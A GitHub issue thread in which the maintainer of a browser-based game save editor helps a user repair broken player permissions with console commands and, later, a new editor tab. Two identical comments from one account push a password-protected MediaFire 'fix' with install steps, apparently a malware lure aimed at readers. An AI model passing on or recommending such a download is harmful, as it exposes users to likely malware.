### ISSUE TITLE
Player Permissions Reset

### ISSUE THREAD

**Issue by Trains6824** [scottanderson/railroad.studio#194]
Hello, 

hope whoever reads this is doing well. id like to request a feature to save some save games.... could you integrate a player permissions reset button to the save editor please? they have recently added it to the game. and some world permissions have gotten completely bugged over time,  if you could add it to your save editor in a way to reset player permissions it would be greatly appreciated. Let me know, Thanks

**Comment by scottanderson** [comment]
Can you be more specific about what needs to be repaired? RS supports reading and writing the permission object, but it lacks a user interface for editing the permission values. You could set a user's permissions by running a command like this in the F12 console:
```js
studio.railroad.players[0].permissions =  {values: [false, false, true, false, true, true, false, true]}
```

**Comment by Trains6824** [comment]
was just wondering if their was a clean way to add in a permissions reset for the game players.  il try the command.

**Comment by Trains6824** [comment]
to make a long story short, i used your save editor to name, number, and label all my rolling stock and trains in the game. save it. and according to the devs somehow my permissions have been screwed up and they think the 3rd party editor here is to blame. so i was wondering if their was a way to add a permissions reset as thats the values in game thats locked and broken in my save.

**Comment by Trains6824** [comment]
okay, where should i place the command? iv tried finding the F12 console menu  in railroad studio and the game but get nothing

**Comment by scottanderson** [comment]
Can you please share the save file that the game is not able to load?

You can run the command in the javascript console of your web browser after loading the save file in RS. If you're using a web browser other than chrome, the shortcut to open the JS console may be something other than F12.

You can remove the permissions objects from the save file completely by running:
```js
studio.railroad.players.forEach(p => p.permissions = undefined)
```

**Comment by Trains6824** [comment]
im using mozilla firefox currently. :) and i see. sure.

**Comment by Trains6824** [comment]
[Pine Valley MP 1A.zip](https://github.com/user-attachments/files/16823100/Pine.Valley.MP.1A.zip)

Attached is the save

**Comment by Trains6824** [comment]
the game loads the save fine. just the permissions have broke somehow and its causing cascading issues

**Comment by Trains6824** [comment]
i put the command in and it looks like it takes but then i try to save it and the save button doesnt do anything lol. uggg any luck on your end as to what happend? or progress

**Comment by scottanderson** [comment]
I'm not sure how RS could have created an issue here, since it not be making any modifications to the permissions. Your save file has permissions present for the first two players, but there are no permissions for the rest of the players in the file. Do you have a working save file from before you used RS to edit the file?

**Comment by Trains6824** [comment]
its been so long i dont think so sadly. :(

**Comment by Trains6824** [comment]
could you add permissions for the other players then save it? like make all the permissions true then save it so i can see if i can get it to work then lol

**Comment by scottanderson** [comment]
See https://github.com/scottanderson/railroad.studio#editing-save-files-advanced for instructions on using console commands. The save button will write a new file to your browser's downloads directory.

**Comment by Trains6824** [comment]
![2036 Aug  30, 2024](https://github.com/user-attachments/assets/3a5a602e-0398-4634-acc0-3a874194b924)

Getting this error after trying to save......

**Comment by Trains6824** [comment]
if you are willing do you have discord? may be able to progress through this faster one on one in a voicecall :)

**Comment by scottanderson** [comment]
Player permissions should be set to an object like this:
```js
studio.railroad.players[0].permissions = {values: [false, false, true, false, true, true, false, true]}
```

This won't do anything on its own though, since your save file will still only have permissions set for the first two players. I would suggest running the other command that I shared to remove the permissions, as this might trigger the game to regenerate default permissions.

**Comment by Trains6824** [comment]
okay, so if i do your command "studio.railroad.players.forEach(p => p.permissions = undefined)" save it then open it and press tab it kills the game.

so im pretty sure their has to be some values their.

**Comment by Trains6824** [comment]
if i run both in series then save i get the same series of errors it looks like. and wont download to my folder*

![2037 Aug  30, 2024](https://github.com/user-attachments/assets/ad480b5f-c523-4e92-b18d-78e430d9d4b4)

**Comment by Trains6824** [comment]
and wont download to my folder*

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by scottanderson** [comment]
I do not believe using RS has any possibility of corrupting your save file, so I'm going to close this issue. This seems to be an issue with RO itself being unable to load legacy save files correctly. The game devs should consider fixing the save loading logic to automatically fill in the missing permission values, as it does for any other missing value.

#196 adds a permission editor that you can potentially use to add player permissions to an existing save. I can not guarantee that this will work, and I won't be able to offer support for broken saves.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Trains6824** [comment]
@scottanderson hello. sorry for the delay. promptly ended up passing out it was almost 3 lmao.  i see you said you added a permission editior to try.  where in Studio did you put it? lol Thanks

**Comment by scottanderson** [comment]
Permissions are an attribute of the player object, so the editor is in the
players tab.

If you don't see it, make sure you're running the latest version of RS by
holding Ctrl and refreshing your web browser.

**Comment by Trains6824** [comment]
ah, theirs the tab. :D thanks. :) will try it and see how i get on. appreciate you taking the time to talk with me about this. i know this wasnt directly your problem. just looking for some constructive support. 👍

**Comment by Trains6824** [comment]
okay, so i loaded the save, set all the perms to all. then tried to save and the editor is doing nothing.  getting an uncaught error.
![2041 Aug  31, 2024](https://github.com/user-attachments/assets/6fc54b38-1ef2-4358-b91b-b435b6a16d23)

**Comment by scottanderson** [comment]
This is likely because you added permissions to a player without adding permissions to all the players listed before them. It is not possible to serialize this state back to GVAS, as `ArrayProperty` does not permit empty entries.

**Comment by Trains6824** [comment]
ah, okay, that seams to have done it. lets see......

**Comment by Trains6824** [comment]
sigh... no dice. still crashes... i appreciate you trying with me... any other advice?

**Comment by Trains6824** [comment]
OMG it works :) Thanks so Much. 300 HR Save FIXED
